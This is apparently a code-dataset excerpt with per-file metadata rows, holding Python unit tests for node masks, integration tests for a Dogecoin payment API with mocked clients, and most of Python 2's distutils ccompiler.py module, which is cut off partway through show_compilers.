masks = node.metadatatype.filter_masks(masktype="testmasktype", language="en").all()
assert len(masks) == 1
assert masks[0]["masktype"] == "testmasktype"
def test_update_node(session, req, schema_init, some_node, simple_mask_with_maskitems, guest_user):
mask = simple_mask_with_maskitems
node = some_node
req.form["testattr"] = u"updated"
req.form["newattr"] = u"new"
req.form["nodename"] = u"new_name"
req.form["system.attr"] = u"sys"
mask.update_node(node, req, guest_user)
assert node["testattr"] == u"updated"
assert node["newattr"] == u"new"
assert node.name == u"new_name"
assert node.system_attrs["attr"] == u"sys"
def test_update_node_check(session, req, schema_init, some_node, simple_mask_with_maskitems, guest_user):
mask = simple_mask_with_maskitems
node = some_node
# initial value
mask.update_node(node, req, guest_user)
node["check"] = "1"
# enabled -> disabled without request value
mask.update_node(node, req, guest_user)
assert node["check"] == "0"
# disabled -> enabled
req.form["check"] = "1"
mask.update_node(node, req, guest_user)
assert node["check"] == "1"
| gpl-3.0 | -1,315,670,322,769,200,000 | 32.067797 | 105 | 0.656586 | false |
smilledge/transient | transient/test/integration/test_api.py | 1 | 2584 | import json
from decimal import Decimal
from dogecoinrpc.data import TransactionInfo
from mock import patch
from transient.test.integration import BaseIntegrationTest
class TestAPI(BaseIntegrationTest):
def test_ping(self):
r = self.client.get("/ping")
self.assertEqual(r.status_code, 200)
self.assertEqual(r.data, "pong")
@patch('transient.services.payments.CoindClient')
def test_post_payment(self, coind_mock):
coind_mock.return_value.is_valid_address.return_value = True
coind_mock.return_value.create_address.return_value = "D5Km7yuVkJnPGWHf2UfvNMxLDwGsMDn9ya"
payload = dict(currency="DOGE", amount="999.999", address="DGMJjZjgdGDmgk21PARUajeUpGNrpq6kph")
r = self.client.post("/payments", content_type="application/json", data=json.dumps(payload))
self.assertEqual(r.status_code, 200)
self.assertTrue(r.json["success"])
payment = r.json["payment"]
response_fields = ["id", "amount_confirmed", "amount_received", "currency", "amount", "payment_address",
"status", "created_at"]
self.assertEqual(payment.keys().sort(), response_fields.sort())
self.assertEqual(payment["amount"], payload["amount"])
self.assertEqual(payment["currency"], payload["currency"])
self.assertEqual(payment["status"], "UNPAID")
@patch('transient.services.transactions.CoindClient')
def test_post_transaction(self, coind_mock):
transaction_id = "ac3b07ac490b76b7d3f845e0593030e48ac44032ba8e3690a4e5f2e09416ed76"
payment_address = "D5Km7yuVkJnPGWHf2UfvNMxLDwGsMDn9ya"
coind_mock.return_value.get_transaction.return_value = TransactionInfo(**{
"txid": transaction_id,
"address": payment_address,
"category": "receive",
"account": "lorem ipsum",
"amount": Decimal("10"),
"fee": 1,
"confirmations": 0
})
payload = dict(currency="DOGE", transaction=transaction_id)
r = self.client.post("/transactions", content_type="application/json", data=json.dumps(payload))
transaction = r.json["transaction"]
self.assertEqual(r.status_code, 200)
self.assertTrue(r.json["success"])
self.assertEqual(transaction["transaction_id"], transaction_id)
self.assertEqual(transaction["amount"], "10")
self.assertEqual(transaction["currency"], payload["currency"])
self.assertEqual(transaction["confirmations"], 0)
self.assertEqual(transaction["fee"], "1")
| mit | -4,155,394,553,245,775,000 | 42.066667 | 112 | 0.662539 | false |
2ndy/RaspIM | usr/lib/python2.6/distutils/ccompiler.py | 1 | 48809 | """distutils.ccompiler
Contains CCompiler, an abstract base class that defines the interface
for the Distutils compiler abstraction model."""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id$"
import sys, os, re
from types import *
from copy import copy
from distutils.errors import *
from distutils.spawn import spawn
from distutils.file_util import move_file
from distutils.dir_util import mkpath
from distutils.dep_util import newer_pairwise, newer_group
from distutils.util import split_quoted, execute
from distutils import log
class CCompiler:
"""Abstract base class to define the interface that must be implemented
by real compiler classes. Also has some utility methods used by
several compiler classes.
The basic idea behind a compiler abstraction class is that each
instance can be used for all the compile/link steps in building a
single project. Thus, attributes common to all of those compile and
link steps -- include directories, macros to define, libraries to link
against, etc. -- are attributes of the compiler instance. To allow for
variability in how individual files are treated, most of those
attributes may be varied on a per-compilation or per-link basis.
"""
# 'compiler_type' is a class attribute that identifies this class. It
# keeps code that wants to know what kind of compiler it's dealing with
# from having to import all possible compiler classes just to do an
# 'isinstance'. In concrete CCompiler subclasses, 'compiler_type'
# should really, really be one of the keys of the 'compiler_class'
# dictionary (see below -- used by the 'new_compiler()' factory
# function) -- authors of new compiler interface classes are
# responsible for updating 'compiler_class'!
compiler_type = None
# XXX things not handled by this compiler abstraction model:
# * client can't provide additional options for a compiler,
# e.g. warning, optimization, debugging flags. Perhaps this
# should be the domain of concrete compiler abstraction classes
# (UnixCCompiler, MSVCCompiler, etc.) -- or perhaps the base
# class should have methods for the common ones.
    #   * can't completely override the include or library search
# path, ie. no "cc -I -Idir1 -Idir2" or "cc -L -Ldir1 -Ldir2".
# I'm not sure how widely supported this is even by Unix
# compilers, much less on other platforms. And I'm even less
# sure how useful it is; maybe for cross-compiling, but
# support for that is a ways off. (And anyways, cross
# compilers probably have a dedicated binary with the
# right paths compiled in. I hope.)
# * can't do really freaky things with the library list/library
# dirs, e.g. "-Ldir1 -lfoo -Ldir2 -lfoo" to link against
# different versions of libfoo.a in different locations. I
# think this is useless without the ability to null out the
# library search path anyways.
# Subclasses that rely on the standard filename generation methods
# implemented below should override these; see the comment near
# those methods ('object_filenames()' et. al.) for details:
src_extensions = None # list of strings
obj_extension = None # string
static_lib_extension = None
shared_lib_extension = None # string
static_lib_format = None # format string
shared_lib_format = None # prob. same as static_lib_format
exe_extension = None # string
# Default language settings. language_map is used to detect a source
# file or Extension target language, checking source filenames.
# language_order is used to detect the language precedence, when deciding
# what language to use when mixing source types. For example, if some
# extension has two files with ".c" extension, and one with ".cpp", it
# is still linked as c++.
language_map = {".c" : "c",
".cc" : "c++",
".cpp" : "c++",
".cxx" : "c++",
".m" : "objc",
}
language_order = ["c++", "objc", "c"]
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
self.dry_run = dry_run
self.force = force
self.verbose = verbose
# 'output_dir': a common output directory for object, library,
# shared object, and shared library files
self.output_dir = None
# 'macros': a list of macro definitions (or undefinitions). A
# macro definition is a 2-tuple (name, value), where the value is
# either a string or None (no explicit value). A macro
# undefinition is a 1-tuple (name,).
self.macros = []
# 'include_dirs': a list of directories to search for include files
self.include_dirs = []
# 'libraries': a list of libraries to include in any link
# (library names, not filenames: eg. "foo" not "libfoo.a")
self.libraries = []
# 'library_dirs': a list of directories to search for libraries
self.library_dirs = []
# 'runtime_library_dirs': a list of directories to search for
# shared libraries/objects at runtime
self.runtime_library_dirs = []
# 'objects': a list of object files (or similar, such as explicitly
# named library files) to include on any link
self.objects = []
for key in self.executables.keys():
self.set_executable(key, self.executables[key])
# __init__ ()
def set_executables (self, **args):
"""Define the executables (and options for them) that will be run
to perform the various stages of compilation. The exact set of
executables that may be specified here depends on the compiler
class (via the 'executables' class attribute), but most will have:
compiler the C/C++ compiler
linker_so linker used to create shared objects and libraries
linker_exe linker used to create binary executables
archiver static library creator
On platforms with a command-line (Unix, DOS/Windows), each of these
is a string that will be split into executable name and (optional)
list of arguments. (Splitting the string is done similarly to how
Unix shells operate: words are delimited by spaces, but quotes and
backslashes can override this. See
'distutils.util.split_quoted()'.)
"""
# Note that some CCompiler implementation classes will define class
# attributes 'cpp', 'cc', etc. with hard-coded executable names;
# this is appropriate when a compiler class is for exactly one
# compiler/OS combination (eg. MSVCCompiler). Other compiler
# classes (UnixCCompiler, in particular) are driven by information
# discovered at run-time, since there are many different ways to do
# basically the same things with Unix C compilers.
for key in args.keys():
if key not in self.executables:
raise ValueError, \
"unknown executable '%s' for class %s" % \
(key, self.__class__.__name__)
self.set_executable(key, args[key])
# set_executables ()
def set_executable(self, key, value):
if type(value) is StringType:
setattr(self, key, split_quoted(value))
else:
setattr(self, key, value)
def _find_macro (self, name):
i = 0
for defn in self.macros:
if defn[0] == name:
return i
i = i + 1
return None
def _check_macro_definitions (self, definitions):
"""Ensures that every element of 'definitions' is a valid macro
definition, ie. either (name,value) 2-tuple or a (name,) tuple. Do
nothing if all definitions are OK, raise TypeError otherwise.
"""
for defn in definitions:
if not (type (defn) is TupleType and
(len (defn) == 1 or
(len (defn) == 2 and
(type (defn[1]) is StringType or defn[1] is None))) and
type (defn[0]) is StringType):
raise TypeError, \
("invalid macro definition '%s': " % defn) + \
"must be tuple (string,), (string, string), or " + \
"(string, None)"
# -- Bookkeeping methods -------------------------------------------
def define_macro (self, name, value=None):
"""Define a preprocessor macro for all compilations driven by this
compiler object. The optional parameter 'value' should be a
string; if it is not supplied, then the macro will be defined
without an explicit value and the exact outcome depends on the
compiler used (XXX true? does ANSI say anything about this?)
"""
# Delete from the list of macro definitions/undefinitions if
# already there (so that this one will take precedence).
i = self._find_macro (name)
if i is not None:
del self.macros[i]
defn = (name, value)
self.macros.append (defn)
def undefine_macro (self, name):
"""Undefine a preprocessor macro for all compilations driven by
this compiler object. If the same macro is defined by
'define_macro()' and undefined by 'undefine_macro()' the last call
takes precedence (including multiple redefinitions or
undefinitions). If the macro is redefined/undefined on a
per-compilation basis (ie. in the call to 'compile()'), then that
takes precedence.
"""
# Delete from the list of macro definitions/undefinitions if
# already there (so that this one will take precedence).
i = self._find_macro (name)
if i is not None:
del self.macros[i]
undefn = (name,)
self.macros.append (undefn)
def add_include_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
header files. The compiler is instructed to search directories in
the order in which they are supplied by successive calls to
'add_include_dir()'.
"""
self.include_dirs.append (dir)
def set_include_dirs (self, dirs):
"""Set the list of directories that will be searched to 'dirs' (a
list of strings). Overrides any preceding calls to
        'add_include_dir()'; subsequent calls to 'add_include_dir()' add
to the list passed to 'set_include_dirs()'. This does not affect
any list of standard include directories that the compiler may
search by default.
"""
self.include_dirs = copy (dirs)
def add_library (self, libname):
"""Add 'libname' to the list of libraries that will be included in
all links driven by this compiler object. Note that 'libname'
should *not* be the name of a file containing a library, but the
name of the library itself: the actual filename will be inferred by
the linker, the compiler, or the compiler class (depending on the
platform).
The linker will be instructed to link against libraries in the
order they were supplied to 'add_library()' and/or
'set_libraries()'. It is perfectly valid to duplicate library
names; the linker will be instructed to link against libraries as
many times as they are mentioned.
"""
self.libraries.append (libname)
def set_libraries (self, libnames):
"""Set the list of libraries to be included in all links driven by
this compiler object to 'libnames' (a list of strings). This does
not affect any standard system libraries that the linker may
include by default.
"""
self.libraries = copy (libnames)
def add_library_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
libraries specified to 'add_library()' and 'set_libraries()'. The
linker will be instructed to search for libraries in the order they
are supplied to 'add_library_dir()' and/or 'set_library_dirs()'.
"""
self.library_dirs.append (dir)
def set_library_dirs (self, dirs):
"""Set the list of library search directories to 'dirs' (a list of
strings). This does not affect any standard library search path
that the linker may search by default.
"""
self.library_dirs = copy (dirs)
def add_runtime_library_dir (self, dir):
"""Add 'dir' to the list of directories that will be searched for
shared libraries at runtime.
"""
self.runtime_library_dirs.append (dir)
def set_runtime_library_dirs (self, dirs):
"""Set the list of directories to search for shared libraries at
runtime to 'dirs' (a list of strings). This does not affect any
standard search path that the runtime linker may search by
default.
"""
self.runtime_library_dirs = copy (dirs)
def add_link_object (self, object):
"""Add 'object' to the list of object files (or analogues, such as
explicitly named library files or the output of "resource
compilers") to be included in every link driven by this compiler
object.
"""
self.objects.append (object)
def set_link_objects (self, objects):
"""Set the list of object files (or analogues) to be included in
every link to 'objects'. This does not affect any standard object
files that the linker may include by default (such as system
libraries).
"""
self.objects = copy (objects)
# -- Private utility methods --------------------------------------
# (here for the convenience of subclasses)
# Helper method to prep compiler in subclass compile() methods
def _setup_compile(self, outdir, macros, incdirs, sources, depends,
extra):
"""Process arguments and decide which source files to compile."""
if outdir is None:
outdir = self.output_dir
elif type(outdir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
if macros is None:
macros = self.macros
elif type(macros) is ListType:
macros = macros + (self.macros or [])
else:
raise TypeError, "'macros' (if supplied) must be a list of tuples"
if incdirs is None:
incdirs = self.include_dirs
elif type(incdirs) in (ListType, TupleType):
incdirs = list(incdirs) + (self.include_dirs or [])
else:
raise TypeError, \
"'include_dirs' (if supplied) must be a list of strings"
if extra is None:
extra = []
# Get the list of expected output (object) files
objects = self.object_filenames(sources,
strip_dir=0,
output_dir=outdir)
assert len(objects) == len(sources)
pp_opts = gen_preprocess_options(macros, incdirs)
build = {}
for i in range(len(sources)):
src = sources[i]
obj = objects[i]
ext = os.path.splitext(src)[1]
self.mkpath(os.path.dirname(obj))
build[obj] = (src, ext)
return macros, objects, extra, pp_opts, build
def _get_cc_args(self, pp_opts, debug, before):
# works for unixccompiler, emxccompiler, cygwinccompiler
cc_args = pp_opts + ['-c']
if debug:
cc_args[:0] = ['-g']
if before:
cc_args[:0] = before
return cc_args
def _fix_compile_args (self, output_dir, macros, include_dirs):
"""Typecheck and fix-up some of the arguments to the 'compile()'
method, and return fixed-up values. Specifically: if 'output_dir'
is None, replaces it with 'self.output_dir'; ensures that 'macros'
is a list, and augments it with 'self.macros'; ensures that
'include_dirs' is a list, and augments it with 'self.include_dirs'.
Guarantees that the returned values are of the correct type,
i.e. for 'output_dir' either string or None, and for 'macros' and
'include_dirs' either list or None.
"""
if output_dir is None:
output_dir = self.output_dir
elif type (output_dir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
if macros is None:
macros = self.macros
elif type (macros) is ListType:
macros = macros + (self.macros or [])
else:
raise TypeError, "'macros' (if supplied) must be a list of tuples"
if include_dirs is None:
include_dirs = self.include_dirs
elif type (include_dirs) in (ListType, TupleType):
include_dirs = list (include_dirs) + (self.include_dirs or [])
else:
raise TypeError, \
"'include_dirs' (if supplied) must be a list of strings"
return output_dir, macros, include_dirs
# _fix_compile_args ()
def _prep_compile(self, sources, output_dir, depends=None):
"""Decide which souce files must be recompiled.
Determine the list of object files corresponding to 'sources',
and figure out which ones really need to be recompiled.
Return a list of all object files and a dictionary telling
which source files can be skipped.
"""
# Get the list of expected output (object) files
objects = self.object_filenames(sources, output_dir=output_dir)
assert len(objects) == len(sources)
# Return an empty dict for the "which source files can be skipped"
# return value to preserve API compatibility.
return objects, {}
def _fix_object_args (self, objects, output_dir):
"""Typecheck and fix up some arguments supplied to various methods.
Specifically: ensure that 'objects' is a list; if output_dir is
None, replace with self.output_dir. Return fixed versions of
'objects' and 'output_dir'.
"""
if type (objects) not in (ListType, TupleType):
raise TypeError, \
"'objects' must be a list or tuple of strings"
objects = list (objects)
if output_dir is None:
output_dir = self.output_dir
elif type (output_dir) is not StringType:
raise TypeError, "'output_dir' must be a string or None"
return (objects, output_dir)
def _fix_lib_args (self, libraries, library_dirs, runtime_library_dirs):
"""Typecheck and fix up some of the arguments supplied to the
'link_*' methods. Specifically: ensure that all arguments are
lists, and augment them with their permanent versions
(eg. 'self.libraries' augments 'libraries'). Return a tuple with
fixed versions of all arguments.
"""
if libraries is None:
libraries = self.libraries
elif type (libraries) in (ListType, TupleType):
libraries = list (libraries) + (self.libraries or [])
else:
raise TypeError, \
"'libraries' (if supplied) must be a list of strings"
if library_dirs is None:
library_dirs = self.library_dirs
elif type (library_dirs) in (ListType, TupleType):
library_dirs = list (library_dirs) + (self.library_dirs or [])
else:
raise TypeError, \
"'library_dirs' (if supplied) must be a list of strings"
if runtime_library_dirs is None:
runtime_library_dirs = self.runtime_library_dirs
elif type (runtime_library_dirs) in (ListType, TupleType):
runtime_library_dirs = (list (runtime_library_dirs) +
(self.runtime_library_dirs or []))
else:
raise TypeError, \
"'runtime_library_dirs' (if supplied) " + \
"must be a list of strings"
return (libraries, library_dirs, runtime_library_dirs)
# _fix_lib_args ()
def _need_link (self, objects, output_file):
"""Return true if we need to relink the files listed in 'objects'
to recreate 'output_file'.
"""
if self.force:
return 1
else:
if self.dry_run:
newer = newer_group (objects, output_file, missing='newer')
else:
newer = newer_group (objects, output_file)
return newer
# _need_link ()
def detect_language (self, sources):
"""Detect the language of a given file, or list of files. Uses
language_map, and language_order to do the job.
"""
if type(sources) is not ListType:
sources = [sources]
lang = None
index = len(self.language_order)
for source in sources:
base, ext = os.path.splitext(source)
extlang = self.language_map.get(ext)
try:
extindex = self.language_order.index(extlang)
if extindex < index:
lang = extlang
index = extindex
except ValueError:
pass
return lang
# detect_language ()
# -- Worker methods ------------------------------------------------
# (must be implemented by subclasses)
def preprocess (self,
source,
output_file=None,
macros=None,
include_dirs=None,
extra_preargs=None,
extra_postargs=None):
"""Preprocess a single C/C++ source file, named in 'source'.
Output will be written to file named 'output_file', or stdout if
'output_file' not supplied. 'macros' is a list of macro
definitions as for 'compile()', which will augment the macros set
with 'define_macro()' and 'undefine_macro()'. 'include_dirs' is a
list of directory names that will be added to the default list.
Raises PreprocessError on failure.
"""
pass
def compile(self, sources, output_dir=None, macros=None,
include_dirs=None, debug=0, extra_preargs=None,
extra_postargs=None, depends=None):
"""Compile one or more source files.
'sources' must be a list of filenames, most likely C/C++
files, but in reality anything that can be handled by a
particular compiler and compiler class (eg. MSVCCompiler can
handle resource files in 'sources'). Return a list of object
filenames, one per source filename in 'sources'. Depending on
the implementation, not all source files will necessarily be
compiled, but all corresponding object filenames will be
returned.
If 'output_dir' is given, object files will be put under it, while
retaining their original path component. That is, "foo/bar.c"
normally compiles to "foo/bar.o" (for a Unix implementation); if
'output_dir' is "build", then it would compile to
"build/foo/bar.o".
'macros', if given, must be a list of macro definitions. A macro
definition is either a (name, value) 2-tuple or a (name,) 1-tuple.
The former defines a macro; if the value is None, the macro is
defined without an explicit value. The 1-tuple case undefines a
macro. Later definitions/redefinitions/ undefinitions take
precedence.
'include_dirs', if given, must be a list of strings, the
directories to add to the default include file search path for this
compilation only.
'debug' is a boolean; if true, the compiler will be instructed to
output debug symbols in (or alongside) the object file(s).
'extra_preargs' and 'extra_postargs' are implementation- dependent.
On platforms that have the notion of a command-line (e.g. Unix,
DOS/Windows), they are most likely lists of strings: extra
        command-line arguments to prepend/append to the compiler command
line. On other platforms, consult the implementation class
documentation. In any event, they are intended as an escape hatch
for those occasions when the abstract compiler framework doesn't
cut the mustard.
'depends', if given, is a list of filenames that all targets
depend on. If a source file is older than any file in
depends, then the source file will be recompiled. This
supports dependency tracking, but only at a coarse
granularity.
Raises CompileError on failure.
"""
# A concrete compiler class can either override this method
# entirely or implement _compile().
macros, objects, extra_postargs, pp_opts, build = \
self._setup_compile(output_dir, macros, include_dirs, sources,
depends, extra_postargs)
cc_args = self._get_cc_args(pp_opts, debug, extra_preargs)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
self._compile(obj, src, ext, cc_args, extra_postargs, pp_opts)
# Return *all* object filenames, not just the ones we just built.
return objects
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compile 'src' to product 'obj'."""
# A concrete compiler class that does not override compile()
# should implement _compile().
pass
def create_static_lib (self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
"""Link a bunch of stuff together to create a static library file.
The "bunch of stuff" consists of the list of object files supplied
as 'objects', the extra object files supplied to
'add_link_object()' and/or 'set_link_objects()', the libraries
supplied to 'add_library()' and/or 'set_libraries()', and the
libraries supplied as 'libraries' (if any).
'output_libname' should be a library name, not a filename; the
filename will be inferred from the library name. 'output_dir' is
the directory where the library file will be put.
'debug' is a boolean; if true, debugging information will be
included in the library (note that on most platforms, it is the
compile step where this matters: the 'debug' flag is included here
just for consistency).
'target_lang' is the target language for which the given objects
are being compiled. This allows specific linkage time treatment of
certain languages.
Raises LibError on failure.
"""
pass
# values for target_desc parameter in link()
SHARED_OBJECT = "shared_object"
SHARED_LIBRARY = "shared_library"
EXECUTABLE = "executable"
def link (self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
"""Link a bunch of stuff together to create an executable or
shared library file.
The "bunch of stuff" consists of the list of object files supplied
as 'objects'. 'output_filename' should be a filename. If
'output_dir' is supplied, 'output_filename' is relative to it
(i.e. 'output_filename' can provide directory components if
needed).
'libraries' is a list of libraries to link against. These are
library names, not filenames, since they're translated into
filenames in a platform-specific way (eg. "foo" becomes "libfoo.a"
on Unix and "foo.lib" on DOS/Windows). However, they can include a
directory component, which means the linker will look in that
specific directory rather than searching all the normal locations.
'library_dirs', if supplied, should be a list of directories to
search for libraries that were specified as bare library names
(ie. no directory component). These are on top of the system
default and those supplied to 'add_library_dir()' and/or
'set_library_dirs()'. 'runtime_library_dirs' is a list of
directories that will be embedded into the shared library and used
to search for other shared libraries that *it* depends on at
run-time. (This may only be relevant on Unix.)
'export_symbols' is a list of symbols that the shared library will
export. (This appears to be relevant only on Windows.)
'debug' is as for 'compile()' and 'create_static_lib()', with the
slight distinction that it actually matters on most platforms (as
opposed to 'create_static_lib()', which includes a 'debug' flag
mostly for form's sake).
'extra_preargs' and 'extra_postargs' are as for 'compile()' (except
of course that they supply command-line arguments for the
particular linker being used).
'target_lang' is the target language for which the given objects
are being compiled. This allows specific linkage time treatment of
certain languages.
Raises LinkError on failure.
"""
raise NotImplementedError
# Old 'link_*()' methods, rewritten to use the new 'link()' method.
def link_shared_lib (self,
objects,
output_libname,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
self.link(CCompiler.SHARED_LIBRARY, objects,
self.library_filename(output_libname, lib_type='shared'),
output_dir,
libraries, library_dirs, runtime_library_dirs,
export_symbols, debug,
extra_preargs, extra_postargs, build_temp, target_lang)
def link_shared_object (self,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
self.link(CCompiler.SHARED_OBJECT, objects,
output_filename, output_dir,
libraries, library_dirs, runtime_library_dirs,
export_symbols, debug,
extra_preargs, extra_postargs, build_temp, target_lang)
def link_executable (self,
objects,
output_progname,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
target_lang=None):
self.link(CCompiler.EXECUTABLE, objects,
self.executable_filename(output_progname), output_dir,
libraries, library_dirs, runtime_library_dirs, None,
debug, extra_preargs, extra_postargs, None, target_lang)
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options()' function; there is
# no appropriate default implementation so subclasses should
# implement all of these.
def library_dir_option (self, dir):
"""Return the compiler option to add 'dir' to the list of
directories searched for libraries.
"""
raise NotImplementedError
def runtime_library_dir_option (self, dir):
"""Return the compiler option to add 'dir' to the list of
directories searched for runtime libraries.
"""
raise NotImplementedError
def library_option (self, lib):
"""Return the compiler option to add 'dir' to the list of libraries
linked into the shared library or executable.
"""
raise NotImplementedError
def has_function(self, funcname,
includes=None,
include_dirs=None,
libraries=None,
library_dirs=None):
"""Return a boolean indicating whether funcname is supported on
the current platform. The optional arguments can be used to
augment the compilation environment.
"""
# this can't be included at module scope because it tries to
# import math which might not be available at that point - maybe
# the necessary logic should just be inlined?
import tempfile
if includes is None:
includes = []
if include_dirs is None:
include_dirs = []
if libraries is None:
libraries = []
if library_dirs is None:
library_dirs = []
fd, fname = tempfile.mkstemp(".c", funcname, text=True)
f = os.fdopen(fd, "w")
for incl in includes:
f.write("""#include "%s"\n""" % incl)
f.write("""\
main (int argc, char **argv) {
%s();
}
""" % funcname)
f.close()
try:
objects = self.compile([fname], include_dirs=include_dirs)
except CompileError:
return False
try:
self.link_executable(objects, "a.out",
libraries=libraries,
library_dirs=library_dirs)
except (LinkError, TypeError):
return False
return True
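# Illustrative sketch (editor's note, not part of the original module):
# has_function() is typically used as a configure-style feature probe on a
# concrete compiler instance obtained from new_compiler() below.  The
# function and library names here are purely hypothetical examples.
#
#     cc = new_compiler()
#     if cc.has_function("strtod", libraries=["m"]):
#         pass  # safe to rely on strtod() at build time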
def find_library_file (self, dirs, lib, debug=0):
"""Search the specified list of directories for a static or shared
library file 'lib' and return the full path to that file. If
'debug' true, look for a debugging version (if that makes sense on
the current platform). Return None if 'lib' wasn't found in any of
the specified directories.
"""
raise NotImplementedError
# -- Filename generation methods -----------------------------------
# The default implementation of the filename generating methods are
# prejudiced towards the Unix/DOS/Windows view of the world:
# * object files are named by replacing the source file extension
# (eg. .c/.cpp -> .o/.obj)
# * library files (shared or static) are named by plugging the
# library name and extension into a format string, eg.
# "lib%s.%s" % (lib_name, ".a") for Unix static libraries
# * executables are named by appending an extension (possibly
# empty) to the program name: eg. progname + ".exe" for
# Windows
#
# To reduce redundant code, these methods expect to find
# several attributes in the current object (presumably defined
# as class attributes):
# * src_extensions -
# list of C/C++ source file extensions, eg. ['.c', '.cpp']
# * obj_extension -
# object file extension, eg. '.o' or '.obj'
# * static_lib_extension -
# extension for static library files, eg. '.a' or '.lib'
# * shared_lib_extension -
# extension for shared library/object files, eg. '.so', '.dll'
# * static_lib_format -
# format string for generating static library filenames,
# eg. 'lib%s.%s' or '%s.%s'
# * shared_lib_format
# format string for generating shared library filenames
# (probably same as static_lib_format, since the extension
# is one of the intended parameters to the format string)
# * exe_extension -
# extension for executable files, eg. '' or '.exe'
def object_filenames(self, source_filenames, strip_dir=0, output_dir=''):
if output_dir is None:
output_dir = ''
obj_names = []
for src_name in source_filenames:
base, ext = os.path.splitext(src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
raise UnknownFileError, \
"unknown file type '%s' (from '%s')" % (ext, src_name)
if strip_dir:
base = os.path.basename(base)
obj_names.append(os.path.join(output_dir,
base + self.obj_extension))
return obj_names
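# Worked example (editor's note, assuming the Unix-style attribute values
# src_extensions = ['.c'] and obj_extension = '.o' of a concrete subclass):
#
#     cc.object_filenames(['src/foo.c'], output_dir='build')
#         -> ['build/src/foo.o']
#     cc.object_filenames(['src/foo.c'], strip_dir=1, output_dir='build')
#         -> ['build/foo.o']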
def shared_object_filename(self, basename, strip_dir=0, output_dir=''):
assert output_dir is not None
if strip_dir:
basename = os.path.basename (basename)
return os.path.join(output_dir, basename + self.shared_lib_extension)
def executable_filename(self, basename, strip_dir=0, output_dir=''):
assert output_dir is not None
if strip_dir:
basename = os.path.basename (basename)
return os.path.join(output_dir, basename + (self.exe_extension or ''))
def library_filename(self, libname, lib_type='static', # or 'shared'
strip_dir=0, output_dir=''):
assert output_dir is not None
if lib_type not in ("static", "shared", "dylib"):
raise ValueError, "'lib_type' must be \"static\", \"shared\" or \"dylib\""
fmt = getattr(self, lib_type + "_lib_format")
ext = getattr(self, lib_type + "_lib_extension")
dir, base = os.path.split (libname)
filename = fmt % (base, ext)
if strip_dir:
dir = ''
return os.path.join(output_dir, dir, filename)
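# Worked example (editor's note, assuming the UnixCCompiler-style values
# static_lib_format = 'lib%s%s' and static_lib_extension = '.a'; other
# subclasses use different format strings and extensions):
#
#     cc.library_filename('foo')                  -> 'libfoo.a'
#     cc.library_filename('sub/foo')              -> 'sub/libfoo.a'
#     cc.library_filename('sub/foo', strip_dir=1) -> 'libfoo.a'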
# -- Utility methods -----------------------------------------------
def announce (self, msg, level=1):
log.debug(msg)
def debug_print (self, msg):
from distutils.debug import DEBUG
if DEBUG:
print msg
def warn (self, msg):
sys.stderr.write ("warning: %s\n" % msg)
def execute (self, func, args, msg=None, level=1):
execute(func, args, msg, self.dry_run)
def spawn (self, cmd):
spawn (cmd, dry_run=self.dry_run)
def move_file (self, src, dst):
return move_file (src, dst, dry_run=self.dry_run)
def mkpath (self, name, mode=0777):
mkpath (name, mode, dry_run=self.dry_run)
# class CCompiler
# Map a sys.platform/os.name ('posix', 'nt') to the default compiler
# type for that platform. Keys are interpreted as re match
# patterns. Order is important; platform mappings are preferred over
# OS names.
_default_compilers = (
# Platform string mappings
# on a cygwin built python we can use gcc like an ordinary UNIXish
# compiler
('cygwin.*', 'unix'),
('os2emx', 'emx'),
# OS name mappings
('posix', 'unix'),
('nt', 'msvc'),
('mac', 'mwerks'),
)
def get_default_compiler(osname=None, platform=None):
""" Determine the default compiler to use for the given platform.
osname should be one of the standard Python OS names (i.e. the
ones returned by os.name) and platform the common value
returned by sys.platform for the platform in question.
The default values are os.name and sys.platform in case the
parameters are not given.
"""
if osname is None:
osname = os.name
if platform is None:
platform = sys.platform
for pattern, compiler in _default_compilers:
if re.match(pattern, platform) is not None or \
re.match(pattern, osname) is not None:
return compiler
# Default to Unix compiler
return 'unix'
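# Worked example (editor's note): the table above is consulted in order,
# matching either the platform string or the OS name.
#
#     get_default_compiler('posix', 'linux2')  -> 'unix'
#     get_default_compiler('nt', 'win32')      -> 'msvc'
#     get_default_compiler('posix', 'cygwin')  -> 'unix'   (via 'cygwin.*')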
# Map compiler types to (module_name, class_name) pairs -- ie. where to
# find the code that implements an interface to this compiler. (The module
# is assumed to be in the 'distutils' package.)
compiler_class = { 'unix': ('unixccompiler', 'UnixCCompiler',
"standard UNIX-style compiler"),
'msvc': ('msvccompiler', 'MSVCCompiler',
"Microsoft Visual C++"),
'cygwin': ('cygwinccompiler', 'CygwinCCompiler',
"Cygwin port of GNU C Compiler for Win32"),
'mingw32': ('cygwinccompiler', 'Mingw32CCompiler',
"Mingw32 port of GNU C Compiler for Win32"),
'bcpp': ('bcppcompiler', 'BCPPCompiler',
"Borland C++ Compiler"),
'mwerks': ('mwerkscompiler', 'MWerksCompiler',
"MetroWerks CodeWarrior"),
'emx': ('emxccompiler', 'EMXCCompiler',
"EMX port of GNU C Compiler for OS/2"),
}
def show_compilers():
"""Print list of available compilers (used by the "--help-compiler"
options to "build", "build_ext", "build_clib").
"""
# XXX this "knows" that the compiler option it's describing is
# "--compiler", which just happens to be the case for the three
# commands that use it.
